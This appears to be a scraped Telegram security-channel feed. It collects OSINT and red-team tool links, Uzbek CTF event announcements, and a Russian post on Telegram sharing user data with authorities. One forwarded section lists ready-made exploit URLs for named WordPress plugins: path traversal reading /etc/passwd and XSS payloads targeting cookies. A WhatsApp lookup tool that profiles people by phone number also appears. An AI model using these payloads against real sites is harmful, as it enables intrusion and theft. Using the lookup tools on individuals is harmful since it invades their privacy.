sploitify.haxx.it
Curated list of public server-side exploits. Search by keyword, filter by vulnerability type, service affected and OS. Detailed description for each exploit (with PoC, Nuclei template or Metasploit module).
Curated list of public server-side exploits. Search by keyword, filter by vulnerability type, service affected and OS. Detailed description for each exploit (with PoC, Nuclei template or Metasploit module).
👍1
Deep Dive into Discord: OSINT Techniques (by Nina Maelainine)
- Discord Server Directories
- Bot Directories and Resources
- Specialized Tools
https://medium.com/@ninamaelainine/deep-dive-into-discord-osint-techniques-00534bf69371
#osint #socmint
- Discord Server Directories
- Bot Directories and Resources
- Specialized Tools
https://medium.com/@ninamaelainine/deep-dive-into-discord-osint-techniques-00534bf69371
#osint #socmint
👍1
Forwarded from Cat Seclist
Прекрасное в мире плагинов WordPress
*
simple-image-manipulator
activehelper-livehelp
amministrazione-aperta
anti-plagiarism
buddypress-component-stats
dzs-videogallery
e-search
fancy-product-designer
hd-webplayer
localize-my-post
*
simple-image-manipulator
/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd
activehelper-livehelp
/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&
amministrazione-aperta
/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd
anti-plagiarism
/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
buddypress-component-stats
/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
dzs-videogallery
/wp-content/plugins/dzs-videogallery/admin/upload.php
e-search
/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
fancy-product-designer
/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php
hd-webplayer
/wp-content/plugins/hd-webplayer/playlist.php
localize-my-post
/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
👍1
Forwarded from SHADOW:Group
В связи с недавно прошедшими мероприятиями и моим отпуском не было времени упомянуть некоторые крутые недавно опубликованные доклады. И к одному из таких относится ресерч старины Orange Tsai, в ходе которого было найдено сразу несколько CVE и различных мисконфигов в серверах Apache.
Странно, что никто об этом еще не написал, так как материал очень интересный и я всем рекомендую ознакомиться с оригиналом по ссылке. Я также набросал несколько шаблонов для Nuclei на основе этого доклада, которые вы можете доработать или использовать как есть на своих целях (закину их в комменты под постом).
#web #apache #cve
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
All Red Team
Большая подборка как наступательных так для защиты инструментов, повышение привилегий Linux, Windows, сети, , бэкдоры, malware, горизонтальное, боковое движение, закрепление и т.д..
https://github.com/Ondrik8/RED-Team
#статьи_ссылки_scripts
GitHub
GitHub - Ondrik8/RED-Team
Contribute to Ondrik8/RED-Team development by creating an account on GitHub.
Большая подборка как наступательных так для защиты инструментов, повышение привилегий Linux, Windows, сети, , бэкдоры, malware, горизонтальное, боковое движение, закрепление и т.д..
https://github.com/Ondrik8/RED-Team
#статьи_ссылки_scripts
GitHub
GitHub - Ondrik8/RED-Team
Contribute to Ondrik8/RED-Team development by creating an account on GitHub.
GitHub
GitHub - Ondrik8/RED-Team
Contribute to Ondrik8/RED-Team development by creating an account on GitHub.
👍1
Forwarded from Kiberxavfsizlik markazi
#css2024 #cknews
🦁 Cyberkent 2.0: “Red team” saralash bosqichida ishtirok etish uchun ro‘yxatdan o‘tish boshlandi
🔴 Joriy yilning 17-sentyabr kuni saralashdan o‘tgan eng kuchli 10 ta jamoa final yo’llanmasini qo’lga kiritadi. Ro’yxatdan o’tish 14-sentyabrgacha davom etadi.
🔴 Red team - kiberxavfsizlik sohasida tashkilotning xavfsizlik holatini sinab ko'rish va tizimlardagi zaifliklarni aniqlash uchun mo'ljallangan maxsus jamoalar hisoblanadi.
✅ “Red team” asosiy vazifalari quyidagilardan iborat:
- Zaifliklarni aniqlash;
- Penetratsion testlar o'tkazish;
- Tizim himoyasini chetlab o'tish;
- Ma'lumotlarni olish va nazoratni qo'lga kiritish;
Batafsil: ctf.cyberkent.uz
🌐 Website📝 Telegram🌐 Facebook 📹 Youtube
- Zaifliklarni aniqlash;
- Penetratsion testlar o'tkazish;
- Tizim himoyasini chetlab o'tish;
- Ma'lumotlarni olish va nazoratni qo'lga kiritish;
Batafsil: ctf.cyberkent.uz
| | | Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
⚙️ Subdomain Generator
If you want to create subdomains quickly, try this site.
🔗 Source:
https://husseinphp.github.io/subdomain/
#subdomain #generator #bugbounty #web
If you want to create subdomains quickly, try this site.
🔗 Source:
https://husseinphp.github.io/subdomain/
#subdomain #generator #bugbounty #web
👍1
https://osinttools.io/
Introducing OSINTtools.io: Best OSINT tools directory
Right now, its just the MVP, we are working on making it a Nextgen OSINT tools directory which will be completed soon.
#osint #socmint #osinttools #intelligence #webint #geoint
osinttools.io
Best OSINT Tools Directory
Your one-stop platform for all OSINT tools and related information.
The most up to date osint tools collection on the internet.
Introducing OSINTtools.io: Best OSINT tools directory
Right now, its just the MVP, we are working on making it a Nextgen OSINT tools directory which will be completed soon.
#osint #socmint #osinttools #intelligence #webint #geoint
osinttools.io
Best OSINT Tools Directory
Your one-stop platform for all OSINT tools and related information.
The most up to date osint tools collection on the internet.
OSINT Tools
OSINT Tools - Your One-Stop Destination for OSINT Tools
Discover, explore and master the best OSINT tools for your investigations. 300+ curated tools and collections.
👍1
Telegram ≠ Анонимность
Вот и последствия визита Дурова во Францию, со всеми прелестными лозунгами "freedurov"... Как многие думаю уже могли слышать, закрылись несколько крупнейших team. Для тех кто не в теме, это команды которые занимались мошенничеством (для полных чайников). Все конечно могут связать это с долгим следствием, или великой работой органов, но к сожалению всё намного проще
Команды по обману, думаю последнее за что многим нужно переживать. Telegram уже давно используется как инструмент, с помощью которого можно достичь анонимности - но, теперь всё стало куда хуже. После поездки во Францию, Паша пришёл к соглашению с властями, условия которого гласят простую вещь: "Мы делаем запрос - ты отвечаешь". Я честно говоря сомневаюсь что данная услуга будет работать для правоохранительных органов России, но, для всего западного мира точно
Из нынешних реалий следует то, что если по вам \ вашему каналу \ вашей группе \ вашему боту сделают запрос - Telegram передаст все возможные данные органам. С одной стороны Пашу можно было понять, а со второй мне очень жаль, что Telegram теперь просто хороший мессенджер, и не более.
Паша звал нас сюда под предлогом анонимности. Но, когда количество пользователей доросло до миллиарда, Паша решил сделать пост - сказав о том, что нас всего 0.1%, а все остальные 99.9% (нормальных пользователей) не должны страдать. Конечно, мне не ясно как они страдают. Но, ясно то что анонимность в мессенджере Telegram, как и свобода слова, пошли нахуй...
From Deanon Club
Вот и последствия визита Дурова во Францию, со всеми прелестными лозунгами "freedurov"... Как многие думаю уже могли слышать, закрылись несколько крупнейших team. Для тех кто не в теме, это команды которые занимались мошенничеством (для полных чайников). Все конечно могут связать это с долгим следствием, или великой работой органов, но к сожалению всё намного проще
Команды по обману, думаю последнее за что многим нужно переживать. Telegram уже давно используется как инструмент, с помощью которого можно достичь анонимности - но, теперь всё стало куда хуже. После поездки во Францию, Паша пришёл к соглашению с властями, условия которого гласят простую вещь: "Мы делаем запрос - ты отвечаешь". Я честно говоря сомневаюсь что данная услуга будет работать для правоохранительных органов России, но, для всего западного мира точно
Из нынешних реалий следует то, что если по вам \ вашему каналу \ вашей группе \ вашему боту сделают запрос - Telegram передаст все возможные данные органам. С одной стороны Пашу можно было понять, а со второй мне очень жаль, что Telegram теперь просто хороший мессенджер, и не более.
Паша звал нас сюда под предлогом анонимности. Но, когда количество пользователей доросло до миллиарда, Паша решил сделать пост - сказав о том, что нас всего 0.1%, а все остальные 99.9% (нормальных пользователей) не должны страдать. Конечно, мне не ясно как они страдают. Но, ясно то что анонимность в мессенджере Telegram, как и свобода слова, пошли нахуй...
From Deanon Club
👍2
Forwarded from Kiberxavfsizlik markazi
Media is too big
VIEW IN TELEGRAM
#cyberkent2024 #cknews
🦁 CYBERKENT 2.0
🔴 Xakerlar musobaqasiga tayyorgarlik avjida
Ma’lumot uchun, “Cyberkent” musobaqasi joriy yilning 9-10 oktyabr kunlari “Intercontinental Tashkent” mehmonxonasida bo‘lib o‘tishi rejalashtirilgan.
Batafsil: 1. cyberkent.uz
2. ctf.cyberkent.uz
———
⏺ Подготовка к хакерскому соревнованию в самом разгаре
Для информации, соревнование «Сyberkent» запланировано на 9-10 октября текущего года в отеле «Intercontinental Tashkent».
Подробно: 1. cyberkent.uz
2. ctf.cyberkent.uz
🌐 Website📝 Telegram🌐 Facebook 📹 Youtube
Ma’lumot uchun, “Cyberkent” musobaqasi joriy yilning 9-10 oktyabr kunlari “Intercontinental Tashkent” mehmonxonasida bo‘lib o‘tishi rejalashtirilgan.
Batafsil: 1. cyberkent.uz
2. ctf.cyberkent.uz
———
Для информации, соревнование «Сyberkent» запланировано на 9-10 октября текущего года в отеле «Intercontinental Tashkent».
Подробно: 1. cyberkent.uz
2. ctf.cyberkent.uz
| | | Please open Telegram to view this post
VIEW IN TELEGRAM
👍2🔥1🖕1👨💻1
Forwarded from Kiberxavfsizlik markazi
“Workshop”da o‘z kelajagingni tanla!
🦁 2024-yil 10-oktyabr kuni “CYBERKENT 2.0” respublika musobaqasi doirasida “WORKSHOP” seminar-treningi bo‘lib o‘tishi rejalashtirilgan.
⏺ Ushbu seminar-treningda Siz kiberxavfsizlik sohasidagi malakali mutaxassislar bilan jonli muloqot qilish bilan birgalikda, undagi ishtirokingiz kiberxavfsizlik sohasidagi karyerangizning debochasi bo‘lishi mumkin.
🔴 Seminar quyidagi mavzularda bo‘ladi:
⏺ UZCERT xizmati va uning eng yaxshi amaliyoti;
⏺ “Kiberdetektiv qanday ishlaydi?” mavzusidagi ma’ruzalar;
⏺ Zararli fayllarni tahlil qilish: tahlil usullari va muhitlari;
⏺ O‘zbekistondagi Internet foydalanuvchilari orasida eng keng tarqalgan zararli viruslar va ularning tahlili;
📍 Manzil
✅ Batafsil
Sizni ushbu kiberxavfsizlik yo‘nalishi bo‘yicha bo‘lib o‘tadigan seminar-treningga taklif qilamiz.
🌐 Website📝 Telegram🌐 Facebook 📹 Youtube
Sizni ushbu kiberxavfsizlik yo‘nalishi bo‘yicha bo‘lib o‘tadigan seminar-treningga taklif qilamiz.
| | | Please open Telegram to view this post
VIEW IN TELEGRAM
👍2🔥1
whatsapp.checkleaked — OSINT утилита позволяющая получить информацию о профиле WhatsApp по номеру телефона.
- ID;
- Описание;
- Адрес электронной почты;
- Веб-сайт;
- Местоположение и т. д.
Можно использовать не только для бизнес-аккаунтов, но и для личных аккаунтов, вход в WhatsApp не требуется, работает прямо из браузера + есть API.
Сохраняем и используем бесплатно ТУТ
#soft #osint
- ID;
- Описание;
- Адрес электронной почты;
- Веб-сайт;
- Местоположение и т. д.
Можно использовать не только для бизнес-аккаунтов, но и для личных аккаунтов, вход в WhatsApp не требуется, работает прямо из браузера + есть API.
Сохраняем и используем бесплатно ТУТ
#soft #osint
👍1